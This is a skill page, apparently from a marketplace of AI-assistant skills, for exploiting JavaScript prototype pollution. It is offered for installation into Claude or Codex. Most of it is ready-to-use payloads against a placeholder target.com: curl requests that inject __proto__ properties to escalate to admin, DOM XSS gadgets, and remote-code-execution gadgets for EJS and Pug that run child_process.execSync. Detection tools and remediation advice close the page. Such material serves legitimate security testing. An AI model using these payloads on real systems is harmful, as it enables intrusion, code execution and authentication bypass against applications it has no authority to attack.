メニュー
Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.
SOC 2 Type II audit preparation involves designing, implementing, and demonstrating the operational effectiveness of controls aligned to the AICPA Trust Services Criteria (TSC) over a defined audit pe
UI/UX best practices for web interfaces. Use when reviewing animations, CSS, audio, typography, UX patterns, prefetching, or icon implementations. Covers 11 categories from animation principles to typography. Outputs file:line findings.
Configure AWS Verified Access to provide VPN-less zero trust network access to internal applications using identity and device posture verification with Cedar policy language.
Configuring Google Cloud Identity-Aware Proxy (IAP) to enforce per-request identity verification for Compute Engine, App Engine, Cloud Run, and GKE services using access levels, context-aware policies, and programmatic access with service accounts.
Configuring Zscaler Private Access (ZPA) to replace traditional VPN with zero trust network access by deploying App Connectors, defining application segments, configuring access policies based on user identity and device posture, and integrating with IdPs.
| name | exploiting-prototype-pollution-in-javascript |
| description | Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | ["prototype-pollution","javascript","node-js","xss","rce","property-injection","dom-xss","server-side-pollution"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
// Client-side: Test URL-based sources
// Navigate to: http://target.com/page?__proto__[polluted]=true
// Or use constructor: http://target.com/page?constructor[prototype][polluted]=true
// Check in browser console:
console.log(({}).polluted); // If returns "true", pollution confirmed
// Common URL-based pollution vectors:
// ?__proto__[key]=value
// ?__proto__.key=value
// ?constructor[prototype][key]=value
// ?constructor.prototype.key=value
// Hash fragment pollution:
// http://target.com/#__proto__[key]=value
# Test via JSON body with __proto__
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true}}'
# Test via constructor.prototype
curl -X POST http://target.com/api/update \
-H "Content-Type: application/json" \
-d '{"constructor": {"prototype": {"isAdmin": true}}}'
# Test for status code reflection (detection technique)
# Pollute status property to detect server-side pollution
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"status": 510}}'
# If response returns 510, server-side pollution confirmed
# JSON content type pollution
curl -X POST http://target.com/api/settings \
-H "Content-Type: application/json" \
-d '{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/environ"}}'
// Step 1: Find pollution source (URL parameter, JSON input, postMessage)
// Step 2: Find a gadget - a property read from prototype that reaches a sink
// Common gadgets for DOM XSS:
// innerHTML gadget:
// ?__proto__[innerHTML]=<img/src/onerror=alert(1)>
// jQuery $.html() gadget:
// ?__proto__[html]=<img/src/onerror=alert(1)>
// transport URL gadget (common in analytics scripts):
// ?__proto__[transport_url]=data:,alert(1)//
// Sanitizer bypass via prototype pollution:
// ?__proto__[allowedTags]=<script>
// ?__proto__[tagName]=IMG
// Use DOM Invader (Burp Suite built-in):
// 1. Enable DOM Invader in Burp's embedded browser
// 2. Enable Prototype Pollution option
// 3. Browse application - DOM Invader auto-detects sources
// 4. Click "Scan for gadgets" to find exploitable sinks
# Node.js child_process gadget (RCE)
# If application calls child_process.execSync(), spawn(), or fork():
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"shell": "node", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'
# EJS template engine gadget
curl -X POST http://target.com/api/update \
-H "Content-Type: application/json" \
-d '{"__proto__": {"client": true, "escapeFunction": "JSON.stringify; process.mainModule.require(\"child_process\").execSync(\"id\")"}}'
# Handlebars template gadget
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}'
# Pug template engine gadget
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"block": {"type": "Text", "line": "process.mainModule.require(\"child_process\").execSync(\"id\")"}}}'
# Pollute isAdmin or role property
curl -X POST http://target.com/api/profile \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true, "role": "admin"}}'
# Pollute auth-related properties
curl -X POST http://target.com/api/settings \
-H "Content-Type: application/json" \
-d '{"__proto__": {"verified": true, "emailVerified": true}}'
# Bypass JSON schema validation
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"additionalProperties": true}}'
# Use ppfuzz for automated detection
ppfuzz -l urls.txt -o results.txt
# Nuclei templates for prototype pollution
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/prototype-pollution.yaml
# Server-side detection with Burp Scanner
# Enable "Server-side prototype pollution" scan check
# Review issues in Burp Dashboard
# Manual detection via timing/error-based techniques
# Pollute a property that causes detectable server behavior change
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"toString": "polluted"}}'
# If server errors (500), pollution is working
| Concept | Description |
|---|---|
| Prototype Chain | JavaScript inheritance mechanism where objects inherit from Object.prototype |
| proto | Accessor property that exposes the prototype of an object |
| Pollution Source | Input point that allows setting properties on Object.prototype |
| Pollution Sink | Code that reads a polluted property and performs a dangerous operation |
| Gadget | A property that flows from prototype to a dangerous sink (source-to-sink chain) |
| Deep Merge | Recursive object merge functions that may process proto as a regular key |
| constructor.prototype | Alternative path to access and pollute the prototype object |
| Tool | Purpose |
|---|---|
| DOM Invader | Burp Suite built-in tool for detecting client-side prototype pollution |
| Prototype Pollution Gadgets Scanner | Burp extension for server-side gadget detection |
| ppfuzz | Automated prototype pollution fuzzer |
| Nuclei | Template-based scanner with prototype pollution templates |
| server-side-prototype-pollution | Burp Scanner check for server-side detection |
| ESLint security plugin | Static analysis for prototype pollution patterns in code |
## Prototype Pollution Assessment Report
- **Target**: http://target.com
- **Type**: Server-Side Prototype Pollution
- **Impact**: Remote Code Execution via EJS template gadget
### Findings
| # | Source | Gadget | Sink | Impact |
|---|--------|--------|------|--------|
| 1 | POST /api/merge __proto__ | EJS escapeFunction | Template render | RCE |
| 2 | POST /api/profile __proto__ | isAdmin property | Auth middleware | Privilege Escalation |
| 3 | URL ?__proto__[innerHTML] | innerHTML property | DOM write | Client-Side XSS |
### Remediation
- Use Object.create(null) for configuration objects instead of {}
- Freeze Object.prototype with Object.freeze(Object.prototype)
- Sanitize __proto__ and constructor keys in user input
- Use Map instead of plain objects for user-controlled data
- Update vulnerable npm packages (lodash, merge-deep, etc.)